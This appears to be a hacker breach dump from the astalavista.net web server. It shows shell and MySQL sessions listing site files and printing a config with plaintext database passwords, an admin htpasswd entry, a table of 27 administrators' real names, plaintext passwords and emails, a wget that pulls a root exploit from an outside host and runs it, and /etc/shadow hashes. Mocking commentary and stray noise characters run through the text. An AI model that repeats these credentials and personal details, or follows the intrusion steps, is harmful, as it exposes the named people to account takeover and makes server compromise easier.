drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007) n" _0 [$ ]0 M0 T" y
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql3 ?# w# o* q8 G. g9 Q
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com. p! B, }9 g. O+ L( {
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
5 h+ j$ C- u6 p0 udrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
( l6 O) O9 @, x7 }( Y$ H5 a! o-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
, v3 C5 ^; @# @. J! c& Idrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
! [$ t' P' U1 b7 x- w6 k# @) C' [0 bdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
9 a6 k0 `. `5 i; y$ b$ @drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
! l' Z, `1 }2 B. b/ P8 E, D3 P5 T-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
0 G" C/ G3 e- Q% i5 v: ?4 U! X-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
/ ]+ D' P6 P) j* P( Z8 e% k: Ldrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
$ S5 T. |5 ^' H& wdrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour$ p7 h; f* _: W1 ~: K2 ]
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess$ m1 q# P' o$ B, k" i
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
8 j" N K I8 M+ ]& _' Q; E; \' q-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php% ^5 l" j# \4 c R$ k) o' S8 s, i- X
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
) [/ z& j4 _; C-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
5 L0 m4 ]1 N' P: j1 K/ L- Z-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
4 D- x1 m; w$ }0 Z-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf) @, n: j/ n; o5 m
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
" U0 b: ~' r1 N! P5 Fdrwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang( O7 i) ~& m! Y8 A8 E
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
$ I5 b6 ^6 X! b+ J6 M: ~drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log- i* J" F4 p, p" y0 R6 k) e/ u
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
5 f+ B0 p8 U9 b9 n$ x7 }2 ^, b- ydrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata; @, B2 W8 \( S/ h! y" e
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
1 B0 x8 [; }' n( t+ K% D-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf: I1 |, L. m, p i
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
/ B- a5 z7 f, i& G4 i. U3 Z-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
3 U6 A6 F5 Y; ?1 x4 X" a' t9 Kdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss4 w Q8 m, c4 p( R. Q Y1 k: w b
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources; N' c% q1 H- U0 Z! W
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com' i/ _) ]2 p4 q, X# n6 |
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
7 Q. l* h- H& J D+ Y9 w* F2 odrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
. S1 ^+ H2 {/ A% ~+ ^/ b, udrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
3 l+ v! G; _- r3 ?* S( k; Tdrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v24 \, N( B8 v/ G9 x1 H0 b6 Y0 L
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old4 b9 k. v0 t/ y, d* p
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php5 M, s6 d$ S! y4 V$ H" i$ E
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki; o$ Z, Z2 s& z7 s& g9 s9 @' O
# j. s5 Y \! @- j- ~4 `sh-3.2$ head -20 index.php
* f. y" I: \# @, j( m, q<?PHP+ ?; b1 f8 j- t8 f) k \3 [* l
/**' z* h# ~8 F. a
* Mainfile (external) for astalavistaNET v2.0
# o- o r0 c8 J D. p*
3 @( |& m, m% }4 m* @copyright Astalavista IT Engineering GmbH( @. `) s; n$ `; [
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>6 G2 J2 m/ G: P [* L
* @version 1.05 s \' G1 H6 _% a
*/
. h* M3 w3 y9 o9 K
$ v t @% s, s8 o+ K. p if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
/ \/ p- [# U k $dontStartSession = false;
9 j. _ W5 g8 K b } else { B; C5 _* d+ z W! M# V
$dontStartSession = true;
- [9 E' A8 q- R1 C' S" h }: X$ h2 j s4 j; c
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
% B+ P8 d! T( U. X require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
L7 d- B6 Z, L* b7 Y require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
- Q& ?( T G7 T& A- G require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
8 s" L5 i4 l( } n) i- |
" i$ O# J4 p6 j1 N1 ksh-3.2$ cd config& \4 `; B6 m8 g$ J- T6 K
sh-3.2$ ls -la
- y7 ^0 F' f$ k* _total 32
7 p: j# P- N6 q! h, u8 adrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .; R0 _* O2 C. t
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
2 X: L5 [9 S8 f9 h% n3 j; G-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
9 e' c% d |$ y8 k-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php3 h. F& B* @8 {! @) _
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
" y# K e3 d( S8 v# h- O-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php+ f1 ?/ i6 r; B* B
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php- G* o; Y P/ E x5 s p# B7 g
% \5 n; g, E# k; I% G% `+ hsh-3.2$ cat com.conf.php) A( J8 z( }/ N6 r% n" {
[snip]& V; S9 v: y. n# ?- W- G
//member-database& Q `, K7 x+ r) i: Q
$_CONFIG['db_mem_server'] = ‘localhost’;
( d! r7 h4 p$ @7 Q& ?# i* I5 b8 o$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;+ K4 T9 _# m. I6 T: A9 I9 \3 |; Z
$_CONFIG['db_mem_user'] = ‘astanet_db’;& [" @% n0 f0 D) |0 p
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;: j4 K3 u" p) l* H; Z& t
$_CONFIG['db_mem_debug'] = false; //true or false- V* |5 p9 I7 R: Q0 d
//ads-database
0 U+ K! W4 ?, Q. r5 _0 g% H$_CONFIG['db_ads_server'] = ‘localhost’;
4 O1 C9 \" u$ _8 t5 Y$_CONFIG['db_ads_database'] = ‘astanet_ads’;
" e0 U' Y6 d% p/ f6 w7 L# [$_CONFIG['db_ads_user'] = ‘astanet_db’;8 n; |8 w; s+ b# j: \/ T
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;0 L; Y8 Y4 i* U8 _8 p2 e
$_CONFIG['db_ads_debug'] = false; //true or false
1 O/ {( R6 r; P0 V( {) M1 L//rainbow-database4 A* d8 V$ F8 |1 i
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
I1 }; S% l7 M1 s# N. J& `$_CONFIG['db_rainbow_database'] = ‘rainbow’;
' Y6 h$ H) D. g3 n; A* v4 x7 }5 z$_CONFIG['db_rainbow_user'] = ‘dinu’;
3 ^; I9 p: @; c7 _6 b0 l/ m! E, |% P& o$_CONFIG['db_rainbow_password'] = ‘dinudinu’;: p1 z9 l% h6 v. M
$_CONFIG['db_rainbow_debug'] = false; //true or false2 R* n$ Y& c' }" T0 P' F% |' `1 ]: Q
//mailing lists database
5 O: a0 E) k9 }' t. B$_CONFIG['db_mailing_lists_server'] = ‘localhost’;6 \8 W1 J0 B: U( j# o1 b; v
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
6 Y4 R6 q& @1 H( Q- G$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
# T6 o5 C* u& i, l _$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;+ r) z+ W2 U/ K: S
$_CONFIG['db_mailing_lists_debug'] = false; //true or false$ z# b) @5 \) |$ H; Y6 x: I
//paypal
$ t8 P9 x0 t P1 K. L. R$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;6 m+ r; b; O! {. _/ G
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;1 f5 b& j/ i: A3 E7 Z
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;* ]) C, C7 B8 W- N
$_CONFIG['sub_pp_noship'] = ‘1′;
' A, M3 C1 ?* K0 D$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;7 {% T9 _; ?0 r2 L" h
[snip]
+ ^+ W$ ]! q5 o2 [ X( }) u4 J( D5 i! h0 T9 @8 B* Y
sh-3.2$ cd ..2 x: l: {+ d3 @( X4 {
sh-3.2$ cd member
. g2 x/ M% k9 M( xsh-3.2$ ls -la
6 Z4 n9 Z% H- X6 |6 x) }total 20
0 Z6 j E- q; A, n5 w9 l0 ndrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 . U w9 A( `" U7 ^" y6 V
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
, B s7 y6 h* O-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess; d, Z3 D5 b+ A! J- a# L7 y
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
4 }+ c/ Q: j- _# j; @! P) Msh-3.2$ cat .htaccess
2 p" l$ X0 `8 w) YSecFilterEngine off' ]: z7 e4 P# y2 e2 Y" C
1 u0 t& n3 z% d- O3 K% y( ?
sh-3.2$ cd ..
/ y! j I: U5 [sh-3.2$ cd cron: |0 }8 ~, b8 d# ^& u
sh-3.2$ ls -la$ u | P u3 m( i$ r
total 168- g( c& i" F# m+ Y
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
/ B, H5 @; d8 r- N& y) `# r G# rdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..7 v, W& }! \% \9 @, \
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php, g' r$ Q( g' v- a2 I
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
% O* R, g1 p) C# ]-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php/ _4 V( v" e1 g* N6 M, p6 C
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
+ g( F% Q! {* ~8 _9 X-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php. `$ v! }! W# N! i
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php3 T$ _6 d+ a+ m3 }1 U! r
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
8 R5 T8 d: v- j2 B4 l' D-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
' Q7 O1 g$ _* I' U-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
& b* \1 J1 \7 O& E/ j$ [0 ~( W-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
, G/ P8 x V( V: `" H/ X6 S-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php- z* r8 k7 s1 F; x
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
* _7 H3 }' ]+ f$ {" ?# ^/ d0 B4 e) m-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
+ L5 b/ S" {# z1 p: {+ c# f( s-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
8 C% X7 G6 C1 ~. {" G-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php7 A9 B; A# Y6 \0 k- \$ F( v
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
+ g- x) q* `- v% |; s+ Z-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
# m0 k- `4 R" d8 ^( A @-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php/ d3 b$ K1 v* a% l: `
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
( G+ s# [1 {/ \/ c! p% b-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php! ]& B6 i9 ^3 {" N
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php( Q0 y7 j; H: ^8 Q
. L! ]* l: i: W: ksh-3.2$ cd ..( E7 j5 A& b6 v7 }3 B& v2 N5 u
sh-3.2$ cd _007
1 a% X% \+ a: lsh-3.2$ ls -la7 |# C4 j h& s' M: Q! E2 Y; A: q
total 24
: S* g, \1 X- ~* \& D# B* J; L/ Odrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .* `* [2 m @8 z p8 v' o( K4 |
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ../ J4 H j" p$ ]/ r4 A
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess0 B, _2 B0 n4 B
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php% s# t. s5 N) ^. M6 `
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
; i9 ^3 w0 R1 R! ^$ Fdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
5 W/ x* t$ ?8 w# B) X3 Q: [+ l8 w. T0 D
sh-3.2$ cat .htaccess
5 v' M3 {4 Y: x3 TauthType Basic
# @/ T% X9 g6 o- ?4 |authName Admin! `4 Z6 t/ F, c% |! Z9 @& ~
authUserFile /home/astanet/auth/.htadm_pwd
) v/ W( W' H/ o3 ~9 g6 E& y4 Erequire valid-user
$ T$ d# P, n( B+ Q/ D, V8 D9 K5 _3 b* I. G* F
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
Z2 o M" l, ~admin2net:CR0bl65MwhfT
' U% _- a& Z" N8 w
5 K3 c; q; F8 \# T/ \sh-3.2$ mysql -u astanet_db -p
; O- {# \3 {& T2 zEnter password:% W4 b" z$ o# V& \' f! N) y# R
Welcome to the MySQL monitor. Commands end with ; or \g.
( G- X+ C0 Y5 \* dYour MySQL connection id is 275153
% j9 ~ q6 y' C0 b. G: bServer version: 5.0.45-community-log MySQL Community Edition (GPL)0 @( [$ N6 ^' ~
& x( }7 R) U1 Y' h6 d1 Z
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.0 E+ e1 ^; n# X. |9 n
4 p0 Y- \* ]9 w7 |: ^
mysql> show databases;
6 g! Z5 @/ b, w% s' u6 q+———————–+) ^7 n1 @2 I/ i( z5 i* s
| Database |
5 Y3 p1 o) F. G( H' q+———————–+
9 W0 @& N2 e) S8 H7 T, g+ g6 ]| information_schema |
, u0 E$ I7 Q5 l2 v6 z* i/ }# d4 H& X| astanet_ads |
! A6 ]5 h! J4 F2 a& f| astanet_mailing_lists |
1 p/ F- ?- f# b6 w1 K| astanet_mediawiki |; U5 \ o% k; Q* t' c7 z6 F* a
| astanet_membersystem |; n; E. l% l* v) q% V2 ~3 P% [
| test |
9 H# q5 O+ m$ }: A6 a+———————–+ V3 W' S1 p& L5 f" d/ h
6 rows in set (0.00 sec)
8 Y: ?9 b# ?4 X6 O
+ N$ K& f3 j! @/ Q& f/ Xmysql> use astanet_membersystem1 e$ Z1 J3 Z# l, V1 L
Database changed
) U4 h: g6 R" D. _ f% c) a9 ]mysql> show tables;
3 N% `& m; Q |$ D6 m2 U+———————————–+' B) B) f: P1 _1 i3 }
| Tables_in_astanet_membersystem |1 W# b% w7 h: o9 w
+———————————–+
( q" F! [' E" M+ s( n| blacklist_categories |( @: T- \. o5 c# H0 G& U2 Q
| blacklist_content |
& [3 J x, ]4 S: g) c: w9 t| blacklist_levels |
2 J; Z8 x7 U l6 X6 e/ t| blacklist_mcset |+ b- @3 s$ Q: I# |2 F/ f
| dir_categories |
5 _( u, _5 B$ o. Y: j| dir_comments |
- ~" J% }' f: \+ J4 j5 Y- { U) j| dir_links |0 E2 V+ @) ?9 U& r1 E
| dir_temp |9 a- R: j2 A2 L) o P& s! W
| dir_votes |
) O& F9 T0 S! K; g0 s| documents |
4 l8 ?. G/ c2 C' D8 i| documents_categories |* @8 K1 N0 V: [4 C1 b" c* E
| email_content |7 j! y! B" q$ I) }3 t
| email_settings |' t" q, h( t+ l# ~* T, h% n7 m
| exploits |
; m8 _ U3 H( {: x: C {| exploits_categories |
8 e, V) Q5 J% [+ _| exploittree_categories |
/ ^8 `5 n* E$ \/ P| exploittree_exploits |$ j6 N; P) f8 U$ O/ `5 x g/ [
| home_values |
# K9 Q6 _1 b9 p) C/ x4 {/ x* L| iso_countries |
7 T4 b* \3 U' L7 q$ K- Y3 K$ f. \/ K| links_categories |
5 _2 k4 f# A6 H8 ~+ [% c| links_records |
4 j; }& N9 F; C3 e| links_unauth |
1 I4 O% u) m; m; a: D1 M: x| links_votes |
7 a# t& t3 c2 g$ Z0 I9 F0 d" W5 F$ [| log |
: p, E; @1 ]/ s# ^% K| news_categories |& t8 U1 b3 f8 M6 C/ V
| news_comments |
9 y, c/ y( c% {! d2 P2 ~+ B3 t; j| news_emoticons |
$ \; ]( A N* s| news_latest |2 |9 H) M5 o# G# q: q6 i' A
| news_messages | ?" z# D' T. v( J, k# [( ? d
| news_statistics |
+ N2 h& f& Z) w7 P8 `' @| news_votes |$ ? l0 H6 A' l }
| prices_content |9 c- X0 d H% ^* k1 y8 o
| prices_offers |8 \9 W1 E: `% G
| rss_settings |
+ I# ^- F" c# a| sessions |
0 j7 W! \$ A' J. P# b| stats_signups |/ V9 W$ w. [! v1 @ J0 E
| u2u2 |0 Z( q0 ?0 ?0 q) H; i7 _
| u2u_contact |
# X& Z+ j! a. |4 s, s$ x4 j| u2u_settings |
* `! \5 r% E7 M7 Z, x) \) \| user_keywords_selected_categories |
8 g2 i# F$ O. @/ P0 p9 `7 n| users |
. i8 y* {3 |$ v4 J S2 O- ]| users_ipn_test |; c- y% R/ X3 X" J" Z
| users_keyword_values |
% t% I% r5 {, i4 V. s| users_profile |+ N- M0 l" g4 b0 {4 V' F
| users_temp |
* s3 K0 e' T: c$ z* {| users_upgrade |& P' @. l' |7 y4 o
+———————————–+
9 F% Y# Q8 u9 i46 rows in set (0.00 sec): \3 q, o2 K( x3 Q5 E9 z r# X$ Z) M
2 O, x+ X( I, q+ q9 q% ~4 H5 ~mysql> describe users;
! `0 p% F' o/ \5 D. G" \+————————–+————————————–+——+—–+———————+—————-+0 N) [0 I8 [9 Y, Y5 D- z- k- s
| Field | Type | Null | Key | Default | Extra |( C. G( U% G, {/ }+ n$ O7 e& Z2 k, `: m
+————————–+————————————–+——+—–+———————+—————-+8 p$ M' H3 M2 |; Y6 b: e) E/ X
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
9 Q9 y; c, B4 o| user | varchar(50) | NO | | | |7 B; C& W. Q% g6 ?
| nickname | varchar(30) | NO | MUL | anonymous | |- H/ ^1 P! G2 a: S- r
| password | varchar(30) | NO | | | |4 @$ J- E2 E! I6 |, o3 U# a
| userlevel | tinyint(3) | YES | MUL | NULL | |
! W4 `8 {0 V; }& E. A" H9 p: m; S| exp | int(8) unsigned | NO | | 0 | |' f% ~& o7 J- V- E; s, j
| email | varchar(50) | NO | | | |' y! X9 |+ M* `) P
| ip | varchar(15) | NO | | 0 | |/ K- Y* I6 j8 q5 c7 T
| proxy | set(’0′,’1′) | NO | | 0 | |
, X: x2 Z; X/ e6 W0 G/ L4 Z| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |; ?: [# Z+ D+ |! G: i, z( F
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
( d# n) ]4 S3 \5 c' b, M1 N5 c| anz_in | tinyint(1) | NO | | -1 | |8 X; ?: y9 |8 M6 ^
| status | tinyint(1) unsigned | NO | | 0 | |
( v8 v: ~) [, x" e| checked | set(’0′,’1′,’2′) | NO | | 0 | |4 _$ |8 p; t& X. L6 V! f
| freemember | set(’0′,’1′) | NO | | 0 | |
3 V) F8 i! d6 X& F0 c! @ m7 N- X| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |. u& g( o' \+ P& h# G, t @
| lang | tinytext | NO | | | |/ B) p8 y0 J/ T
| adid | smallint(6) | NO | | 0 | | h; Z% F' A* O4 U
| pp_txn_id | varchar(255) | YES | | NULL | |$ D& P5 X+ o" m! E& Z! X
| cnb_transaction_id | varchar(255) | YES | | NULL | |
6 K0 X* r' W) c P0 l, [5 J% ?| cnb_order_id | varchar(255) | YES | | NULL | |5 h' h/ D0 A& t' q2 h' |
| cnb_user_id | int(11) | YES | | 0 | |
3 `/ d0 ]! g& I$ k+————————–+————————————–+——+—–+———————+—————-+* T5 C6 O; A/ S* k9 L& w
22 rows in set (0.01 sec)0 p1 R% t1 I4 P7 j+ Y
& e9 g ~ l6 E: T4 W
mysql> select count(*) as skids from users;
- t' x% m" a- m" Z5 j+——-+( Z2 v; p j/ {7 H. z! }) L$ F$ M
| skids |3 u& b- n5 A, w" T6 ?
+——-+
' [# f2 n2 ~/ [5 ~6 u| 25199 |
9 q. b X% a4 R. {6 K: Z* V& E+——-+. P1 ?2 t Q9 J; ^9 w6 x+ Z" U
1 row in set (0.00 sec)% v0 c# q/ O# s2 G* v6 O
, b- i' E3 Y& f
mysql> select user,nickname,password,email from users where userlevel = 1;
O1 m$ @2 Q! x+————————–+———————-+——————+———————————–+
/ K, S% Z4 i! {) g| user | nickname | password | email |2 w: D3 r/ z( w- d3 E
+————————–+———————-+——————+———————————–+2 S9 ~: I6 H) o$ N" A$ _# r
| pascal | prozac | astaman3 | 链接标记info@astalavista.net |: F: o; W- e4 [+ X$ B" R w
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
6 F1 G3 u9 g* y" c& |2 I| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |3 N( \- E- ?6 i" d
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
, R+ W' {; j( H% I: h| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |1 Z# x U& p: |
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |5 @! t9 O5 k3 C/ u" ]
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |1 z8 U* J8 w4 E0 Q9 j" _$ b
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
5 |2 {2 R2 q6 U| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |2 }' w* y0 n, z! W1 h# }) i. X" h
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
6 n3 ]: t3 k( c; y1 P| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |, _: b( N9 A) N% Q* Q3 n" D. j
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |4 G2 W; x" U2 {$ C% w
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
- u$ `3 _. @7 o: y; I6 U| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |9 T# G8 O Z6 J# Q
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |3 N' q! [9 _: d- L9 W
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
- Z3 {8 \# S9 Z# e6 L( R/ J8 h' Y* }- o| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |- a$ ]$ r) }3 Y% U5 n( I+ J
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |) N/ V- o" n: r( W4 q+ L. u
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
0 V; L; }8 J6 ]2 P| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
- n0 I) w8 }5 H/ m' V# P& |% r| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
( C2 H! G& j- L) j5 J: [. i4 r| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
, `- _4 b, d% e2 {- q| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |/ T# K8 |$ U4 _
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
, k) }% I# u4 c5 d; w8 H% J| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |) @2 p" i/ _0 G# ^4 G8 s
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com | m8 z( ~/ C0 Z7 e3 }
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
. k# t* k. W, c& F: ^+————————–+———————-+——————+———————————–+
& E) j7 C; z1 z# m; m27 rows in set (0.00 sec)
! z s' W J) W+ O& L& M5 j0 y) }4 h F l$ H' o
mysql> exit;* g6 m2 E& }2 T
Bye
* k' t4 O2 A. F- a1 v; b% k6 H& ~! B- y9 A
[~] plaintext passwords? yes,! g! t( ?) X }( j2 _ u* F/ S$ z7 E
Those so called “security professionals” who charge you $6.66 / month to
0 u9 a; o E0 d6 I4 aregister at their hack-proof portal, save your passwords in plaintext…3 d7 p/ G+ D8 D1 k1 `$ h
brilliant! O- j A9 y" h9 X
6 c/ w8 P; U0 z9 O t1 U
[~] This been fun but we want more.: {& Q2 o/ g! d5 L- v, }9 ?
% R% o$ s2 Q5 m7 M( m2 A
sh-3.2$ uname -a
8 f2 @$ I @ [1 u4 ?; m. Y+ ~Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
2 J2 I+ S7 b! ?8 _* Hsh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]" a2 n' ]* O3 {* O8 d x
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
8 F% }: K7 p N+ x; U- `, rResolving anti.sec.labs… 13.33.33.37: L2 r# D* M+ C7 [$ d7 |- L. N; A
Connecting to anti.sec.labs|13.33.33.37|:80… connected.% S6 g0 n% R$ `0 q
HTTP request sent, awaiting response… 200 OK
' ^5 U& T* s* Q5 ` b# RLength: 18200 (18K) [text/plain]1 ^" t, C; F( X! S9 ^: H
Saving to: `g0troot’! U7 l. ~6 o- L2 t/ U, D/ Z$ b
0 G# n6 T# ~' L! i: e, E" _/ Q
100%[=========================================================================================================================================>] 18,200 58.6K/s in1 X% |) g% u! o/ i. ]
0.3s
5 k3 K/ b+ F7 j3 S# i: g9 Z% t) V
* \" n, E/ j- M( s" f18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
; Q9 p. }+ a) ]+ O- Q+ L2 r! W( t/ K% I# U8 R) @' L9 l/ G
sh-3.2$ ./g0troot -i x86_64- o; @0 _: _( e" Q$ }1 L
[+] g0troot - anti.sec.labs
" f. T& d( ^9 T- p[+] Target: 2.6.18-128.1.10.el59 c8 s5 B B& H( X
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
* @/ s. u: b+ Q( Q0 x: y
& D4 d J" I1 s5 S$ I9 w! P, o: x[+] r00tr00t# N- X+ Z. p5 w a- ^
[~] Executing shell…" w$ K6 c! G0 G4 A6 \
6 V. ]( e$ y+ U* e0 h+ a
sh-3.2# id
. q! H( U. V0 Y% Z) k& g6 T0 c, ], zuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
- ^' Q9 c# W6 p- l5 x% a& G2 M: ]
& \) z1 Z8 {" t msh-3.2# cat /etc/shadow
# K7 S: o* A+ D, Z7 qroot 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::8 x6 E4 \. N3 \& m: i* O
[snip]
; H4 t$ \5 E- i+ Q; @admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::( q5 ?4 ?2 l! q; \ J# h
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
